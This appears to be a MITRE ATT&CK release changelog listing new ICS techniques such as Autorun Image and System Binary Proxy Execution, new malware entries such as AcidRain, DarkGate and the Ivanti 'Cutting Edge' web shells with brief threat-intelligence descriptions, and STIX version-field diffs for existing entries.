Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) On iOS, gathering network configuration information is not possible without root access. Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.32.4

ics-attack

New Techniques

[T0895] Autorun Image

Current version: 1.0

Description: Adversaries may leverage AutoRun functionality or scripts to execute malicious code. Devices configured to enable AutoRun functionality or legacy operating systems may be susceptible to abuse of these features to run malicious code stored on various forms of removeable media (i.e., USB, Disk Images [.ISO]). Commonly, AutoRun or AutoPlay are disabled in many operating systems configurations to mitigate against this technique. If a device is configured to enable AutoRun or AutoPlay, adversaries may execute code on the device by mounting the removable media to the device, either through physical or virtual means. This may be especially relevant for virtual machine environments where disk images may be dynamically mapped to a guest system on a hypervisor. An example could include an adversary gaining access to a hypervisor through the management interface to modify a virtual machine’s hardware configuration. They could then deploy an iso image with a malicious AutoRun script to cause the virtual machine to automatically execute the code contained on the disk image. This would enable the execution of malicious code within a virtual machine without needing any prior remote access to that system.


[T0894] System Binary Proxy Execution

Current version: 1.0

Description: Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. (Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands. (Citation: split man page)(Citation: GTFO split) Adversaries may abuse application binaries installed on a system for proxy execution of malicious code or domain-specific commands. These commands could be used to target local resources on the device or networked devices within the environment through defined APIs ([Execution through API](https://attack.mitre.org/techniques/T0871)) or application-specific programming languages (e.g., MicroSCADA SCIL). Application binaries may be signed by the developer or generally trusted by the operators, analysts, and monitoring tools accustomed to the environment. These applications may be developed and/or directly provided by the device vendor to enable configuration, management, and operation of their devices without many alternatives. Adversaries may seek to target these trusted application binaries to execute or send commands without the development of custom malware. For example, adversaries may target a SCADA server binary which has the existing ability to send commands to substation devices, such as through IEC 104 command messages. Proxy execution may still require the development of custom tools to hook into the application binary’s execution.

Minor Version Changes

[T0802] Automated Collection

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
x_mitre_detection
values_changed
STIX FieldOld valueNew Value
modified2023-10-13 17:57:04.179000+00:002024-04-05 16:34:58.587000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[T0840] Network Connection Enumeration

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-13 17:57:13.131000+00:002024-03-29 14:04:50.569000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2
Patches

[T0893] Data from Local System

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-13 17:57:13.921000+00:002024-04-09 20:51:03.049000+00:00
x_mitre_attack_spec_version3.1.03.2.0

Software

enterprise-attack

New Software

[S1125] AcidRain

Current version: 1.0

Description: [AcidRain](https://attack.mitre.org/software/S1125) is an ELF binary targeting modems and routers using MIPS architecture.(Citation: AcidRain JAGS 2022) [AcidRain](https://attack.mitre.org/software/S1125) is associated with the ViaSat KA-SAT communication outage that took place during the initial phases of the 2022 full-scale invasion of Ukraine. Analysis indicates overlap with another network device-targeting malware, VPNFilter, associated with [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: AcidRain JAGS 2022) US and European government sources linked [AcidRain](https://attack.mitre.org/software/S1125) to Russian government entities, while Ukrainian government sources linked [AcidRain](https://attack.mitre.org/software/S1125) specifically to [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: AcidRain State Department 2022)(Citation: Vincens AcidPour 2024)


[S1129] Akira

Current version: 1.0

Description: [Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the a ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024).(Citation: Kersten Akira 2023)


[S1118] BUSHWALK

Current version: 1.0

Description: [BUSHWALK](https://attack.mitre.org/software/S1118) is a web shell written in Perl that was inserted into the legitimate querymanifest.cgi file on compromised Ivanti Connect Secure VPNs during [Cutting Edge](https://attack.mitre.org/campaigns/C0029).(Citation: Mandiant Cutting Edge Part 2 January 2024)(Citation: Mandiant Cutting Edge Part 3 February 2024)


[S1105] COATHANGER

Current version: 1.0

Description: [COATHANGER](https://attack.mitre.org/software/S1105) is a remote access tool (RAT) targeting FortiGate networking appliances. First used in 2023 in targeted intrusions against military and government entities in the Netherlands along with other victims, [COATHANGER](https://attack.mitre.org/software/S1105) was disclosed in early 2024, with a high confidence assessment linking this malware to a state-sponsored entity in the People's Republic of China. [COATHANGER](https://attack.mitre.org/software/S1105) is delivered after gaining access to a FortiGate device, with in-the-wild observations linked to exploitation of CVE-2022-42475. The name [COATHANGER](https://attack.mitre.org/software/S1105) is based on a unique string in the malware used to encrypt configuration files on disk: “She took his coat and hung it up”.(Citation: NCSC-NL COATHANGER Feb 2024)


[S1096] Cheerscrypt

Current version: 1.0

Description: [Cheerscrypt](https://attack.mitre.org/software/S1096) is a ransomware that was developed by [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) and has been used in attacks against ESXi and Windows environments since at least 2022. [Cheerscrypt](https://attack.mitre.org/software/S1096) was derived from the leaked [Babuk](https://attack.mitre.org/software/S0638) source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from [Babuk](https://attack.mitre.org/software/S0638).(Citation: Sygnia Emperor Dragonfly October 2022)(Citation: Trend Micro Cheerscrypt May 2022)


[S1111] DarkGate

Current version: 1.0

Description: [DarkGate](https://attack.mitre.org/software/S1111) first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named "DarkGate" by its author, [DarkGate](https://attack.mitre.org/software/S1111) is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.(Citation: Ensilo Darkgate 2018) DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.(Citation: Trellix Darkgate 2023)


[S1120] FRAMESTING

Current version: 1.0

Description: [FRAMESTING](https://attack.mitre.org/software/S1120) is a Python web shell that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to embed into an Ivanti Connect Secure Python package for command execution.(Citation: Mandiant Cutting Edge Part 2 January 2024)


[S1117] GLASSTOKEN

Current version: 1.0

Description: [GLASSTOKEN](https://attack.mitre.org/software/S1117) is a custom web shell used by threat actors during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to execute commands on compromised Ivanti Secure Connect VPNs.(Citation: Volexity Ivanti Zero-Day Exploitation January 2024)


[S1097] HUI Loader

Current version: 1.0

Description: [HUI Loader](https://attack.mitre.org/software/S1097) is a custom DLL loader that has been used since at least 2015 by China-based threat groups including [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) and [menuPass](https://attack.mitre.org/groups/G0045) to deploy malware on compromised hosts. [HUI Loader](https://attack.mitre.org/software/S1097) has been observed in campaigns loading [SodaMaster](https://attack.mitre.org/software/S0627), [PlugX](https://attack.mitre.org/software/S0013), [Cobalt Strike](https://attack.mitre.org/software/S0154), [Komplex](https://attack.mitre.org/software/S0162), and several strains of ransomware.(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)


[S1119] LIGHTWIRE

Current version: 1.0

Description: [LIGHTWIRE](https://attack.mitre.org/software/S1119) is a web shell written in Perl that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to maintain access and enable command execution by imbedding into the legitimate compcheckresult.cgi component of Ivanti Secure Connect VPNs.(Citation: Mandiant Cutting Edge Part 2 January 2024)(Citation: Mandiant Cutting Edge January 2024)


[S1121] LITTLELAMB.WOOLTEA

Current version: 1.0

Description: [LITTLELAMB.WOOLTEA](https://attack.mitre.org/software/S1121) is a backdoor that was used by UNC5325 during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to deploy malware on targeted Ivanti Connect Secure VPNs and to establish persistence across system upgrades and patches.(Citation: Mandiant Cutting Edge Part 3 February 2024)


[S1101] LoFiSe

Current version: 1.0

Description: [LoFiSe](https://attack.mitre.org/software/S1101) has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) since at least 2023 to identify and collect files of interest on targeted systems.(Citation: Kaspersky ToddyCat Check Logs October 2023)


[S1122] Mispadu

Current version: 1.0

Description: [Mispadu](https://attack.mitre.org/software/S1122) is a banking trojan written in Delphi that was first observed in 2019 and uses a Malware-as-a-Service (MaaS) business model.(Citation: ESET Security Mispadu Facebook Ads 2019)(Citation: SCILabs Malteiro 2021) This malware is operated, managed, and sold by the [Malteiro](https://attack.mitre.org/groups/G1026) cybercriminal group.(Citation: SCILabs Malteiro 2021) [Mispadu](https://attack.mitre.org/software/S1122) has mainly been used to target victims in Brazil and Mexico, and has also had confirmed operations throughout Latin America and Europe.(Citation: SCILabs Malteiro 2021)(Citation: SCILabs URSA/Mispadu Evolution 2023)(Citation: Segurança Informática URSA Sophisticated Loader 2020)


[S1106] NGLite

Current version: 1.0

Description: [NGLite](https://attack.mitre.org/software/S1106) is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.(Citation: NGLite Trojan)


[S1107] NKAbuse

Current version: 1.0

Description: [NKAbuse](https://attack.mitre.org/software/S1107) is a Go-based, multi-platform malware abusing NKN (New Kind of Network) technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities.(Citation: NKAbuse BC)(Citation: NKAbuse SL)


[S1100] Ninja

Current version: 1.0

Description: [Ninja](https://attack.mitre.org/software/S1100) is a malware developed in C++ that has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) to penetrate networks and control remote systems since at least 2020. [Ninja](https://attack.mitre.org/software/S1100) is possibly part of a post exploitation toolkit exclusively used by [ToddyCat](https://attack.mitre.org/groups/G1022) and allows multiple operators to work simultaneously on the same machine. [Ninja](https://attack.mitre.org/software/S1100) has been used against government and military entities in Europe and Asia and observed in specific infection chains being deployed by [Samurai](https://attack.mitre.org/software/S1099).(Citation: Kaspersky ToddyCat June 2022)


[S1109] PACEMAKER

Current version: 1.0

Description: [PACEMAKER](https://attack.mitre.org/software/S1109) is a credential stealer that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including activity against US Defense Industrial Base (DIB) companies.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1123] PITSTOP

Current version: 1.0

Description: [PITSTOP](https://attack.mitre.org/software/S1123) is a backdoor that was deployed on compromised Ivanti Connect Secure VPNs during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to enable command execution and file read/write.(Citation: Mandiant Cutting Edge Part 3 February 2024)


[S1108] PULSECHECK

Current version: 1.0

Description: [PULSECHECK](https://attack.mitre.org/software/S1108) is a web shell written in Perl that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) companies.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1102] Pcexter

Current version: 1.0

Description: [Pcexter](https://attack.mitre.org/software/S1102) is an uploader that has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) since at least 2023 to exfiltrate stolen files.(Citation: Kaspersky ToddyCat Check Logs October 2023)


[S1113] RAPIDPULSE

Current version: 1.0

Description: [RAPIDPULSE](https://attack.mitre.org/software/S1113) is a web shell that exists as a modification to a legitimate Pulse Secure file that has been used by [APT5](https://attack.mitre.org/groups/G1023) since at least 2021.(Citation: Mandiant Pulse Secure Update May 2021)


[S1110] SLIGHTPULSE

Current version: 1.0

Description: [SLIGHTPULSE](https://attack.mitre.org/software/S1110) is a web shell that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) entities.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1104] SLOWPULSE

Current version: 1.0

Description: [SLOWPULSE](https://attack.mitre.org/software/S1104) is a malware that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against U.S. Defense Industrial Base (DIB) companies. [SLOWPULSE](https://attack.mitre.org/software/S1104) has several variants and can modify legitimate Pulse Secure VPN files in order to log credentials and bypass single and two-factor authentication flows.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1112] STEADYPULSE

Current version: 1.0

Description: [STEADYPULSE](https://attack.mitre.org/software/S1112) is a web shell that infects targeted Pulse Secure VPN servers through modification of a legitimate Perl script that was used as early as 2020 including in activity against US Defense Industrial Base (DIB) entities.(Citation: Mandiant Pulse Secure Zero-Day April 2021)


[S1099] Samurai

Current version: 1.0

Description: [Samurai](https://attack.mitre.org/software/S1099) is a passive backdoor that has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) since at least 2020. [Samurai](https://attack.mitre.org/software/S1099) allows arbitrary C# code execution and is used with multiple modules for remote administration and lateral movement.(Citation: Kaspersky ToddyCat June 2022)


[S1124] SocGholish

Current version: 1.0

Description: [SocGholish](https://attack.mitre.org/software/S1124) is a JavaScript-based loader malware that has been used since at least 2017. It has been observed in use against multiple sectors globally for initial access, primarily through drive-by-downloads masquerading as software updates. SocGholish is operated by [Mustard Tempest](https://attack.mitre.org/groups/G1020) and its access has been sold to groups including [Indrik Spider](https://attack.mitre.org/groups/G0119) for downloading secondary RAT and ransomware payloads.(Citation: SentinelOne SocGholish Infrastructure November 2022)(Citation: SocGholish-update)(Citation: Red Canary SocGholish March 2024)(Citation: Secureworks Gold Prelude Profile)


[S1116] WARPWIRE

Current version: 1.0

Description: [WARPWIRE](https://attack.mitre.org/software/S1116) is a Javascript credential stealer that targets plaintext passwords and usernames for exfiltration that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to target Ivanti Connect Secure VPNs.(Citation: Mandiant Cutting Edge January 2024)(Citation: Mandiant Cutting Edge Part 2 January 2024)


[S1115] WIREFIRE

Current version: 1.0

Description: [WIREFIRE](https://attack.mitre.org/software/S1115) is a web shell written in Python that exists as trojanized logic to the visits.py component of Ivanti Connect Secure VPN appliances. [WIREFIRE](https://attack.mitre.org/software/S1115) was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) for downloading files and command execution.(Citation: Mandiant Cutting Edge January 2024)


[S1114] ZIPLINE

Current version: 1.0

Description: [ZIPLINE](https://attack.mitre.org/software/S1114) is a passive backdoor that was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) on compromised Secure Connect VPNs for reverse shell and proxy functionality.(Citation: Mandiant Cutting Edge January 2024)

Major Version Changes

[S0534] Bazar

Current version: 2.0

Version changed from: 1.2 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-29 20:41:20.065000+00:002023-12-04 19:42:13.073000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Bazaloader', 'description': '(Citation: Microsoft Ransomware as a Service)'}
external_references{'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}
x_mitre_aliasesBazaloader

[S0659] Diavol

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[Diavol](https://attack.mitre.org/software/S0659) is a ransot1[Diavol](https://attack.mitre.org/software/S0659) is a ranso
>mware variant first observed in June 2021 that is capable of>mware variant first observed in June 2021 that is capable of
> prioritizing file types to encrypt based on a pre-configure> prioritizing file types to encrypt based on a pre-configure
>d list of extensions defined by the attacker. [Diavol](https>d list of extensions defined by the attacker.  The [Diavol](
>://attack.mitre.org/software/S0659) has been deployed by [Ba>https://attack.mitre.org/software/S0659) Ransomware-as-a Ser
>zar](https://attack.mitre.org/software/S0534) and is thought>vice (RaaS) program is managed by [Wizard Spider](https://at
> to have potential ties to [Wizard Spider](https://attack.mi>tack.mitre.org/groups/G0102) and it has been observed being 
>tre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(>deployed by [Bazar](https://attack.mitre.org/software/S0534)
>Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diav>.(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash D
>ol Ransomware December 2021)>iavol January 2022)(Citation: DFIR Diavol Ransomware Decembe
 >r 2021)(Citation: Microsoft Ransomware as a Service)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 00:59:33.522000+00:002023-12-04 20:15:22.258000+00:00
description[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. The [Diavol](https://attack.mitre.org/software/S0659) Ransomware-as-a Service (RaaS) program is managed by [Wizard Spider](https://attack.mitre.org/groups/G0102) and it has been observed being deployed by [Bazar](https://attack.mitre.org/software/S0534).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)(Citation: Microsoft Ransomware as a Service)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}
Minor Version Changes

[S0552] AdFind

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-09 16:50:06.756000+00:002024-04-04 03:49:04.493000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[S0504] Anchor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-12-15 20:56:24.628000+00:002023-12-04 20:02:47.052000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0456] Aria-body

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-19 17:58:43.342000+00:002024-04-11 02:58:53.131000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0373] Astaroth

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-11-06 20:12:28.502000+00:002024-04-11 02:58:17.763000+00:00
x_mitre_version2.22.3

[S0438] Attor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-07-07 12:35:11.897000+00:002024-04-11 02:57:38.076000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0347] AuditCred

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 14:51:50.371000+00:002024-04-11 02:57:01.302000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0473] Avenger

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 17:44:18.663000+00:002024-04-11 02:56:34.181000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S1081] BADHATCH

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-04 16:53:23.530000+00:002024-04-11 02:55:51.310000+00:00
x_mitre_version1.01.1

[S0017] BISCUIT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 14:57:52.169000+00:002023-12-26 19:55:54.853000+00:00
external_references[3]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.ziphttps://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0520] BLINDINGCAN

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-03-17 15:55:56.257000+00:002024-04-11 02:51:38.922000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0657] BLUELIGHT

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 21:00:52.016000+00:002024-04-11 02:49:24.851000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0415] BOOSTWRITE

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2019-10-15 17:07:57.638000+00:002024-04-11 02:48:51.475000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0574] BendyBear

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 15:02:21.066000+00:002024-04-11 02:54:10.246000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0268] Bisonal

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-18 17:18:36.512000+00:002024-04-11 02:53:35.918000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.02.1

[S0570] BitPaymer

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 22:04:32.509000+00:002024-04-11 02:52:57.879000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0462] CARROTBAT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 03:24:06.264000+00:002024-04-11 02:46:42.264000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0693] CaddyWiper

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 20:38:33.997000+00:002024-04-17 15:09:37.646000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0484] Carberp

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-25 20:08:29.545000+00:002024-04-11 02:47:56.829000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0348] Cardinal RAT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 01:59:34.624000+00:002024-04-11 02:47:11.431000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0020] China Chopper

Current version: 2.5

Version changed from: 2.4 → 2.5

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-10 21:53:43.748000+00:002024-01-03 21:37:14.516000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.42.5

[S1041] Chinoxy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-10 19:58:31.652000+00:002024-04-11 02:46:10.914000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0667] Chrommme

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-04 22:38:46.222000+00:002024-04-11 02:45:43.666000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0154] Cobalt Strike

Current version: 1.12

Version changed from: 1.11 → 1.12

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-09 16:47:36.538000+00:002024-04-17 22:05:58.343000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.111.12

[S0046] CozyCar

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 21:32:59.528000+00:002024-04-11 02:44:33.881000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0488] CrackMapExec

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-07-29 20:19:40.544000+00:002024-03-14 17:29:49.200000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S1033] DCSrv

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 18:55:25.261000+00:002024-04-11 02:39:27.698000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

[S1052] DEADEYE

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-07 19:30:56.058000+00:002024-04-11 02:38:56.409000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[S0213] DOGCALL

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 15:27:25.149000+00:002024-04-11 02:37:34.915000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0497] Dacls

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-09-02 18:48:58.442000+00:002024-04-11 02:43:00.252000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S1014] DanBot

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-01 14:11:46.207000+00:002024-04-11 02:42:34.540000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0673] DarkWatchman

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 03:34:53.944000+00:002024-04-11 02:40:18.361000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0081] Elise

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 23:20:16.933000+00:002024-04-11 02:35:48.740000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0082] Emissary

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-09 14:21:48.477000+00:002024-04-11 02:35:14.040000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0634] EnvyScout

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:24:29.056000+00:002024-04-11 02:34:42.912000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0401] Exaramel for Linux

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 22:43:50.451000+00:002024-04-11 02:34:14.304000+00:00
x_mitre_attack_spec_version2.1.03.2.0
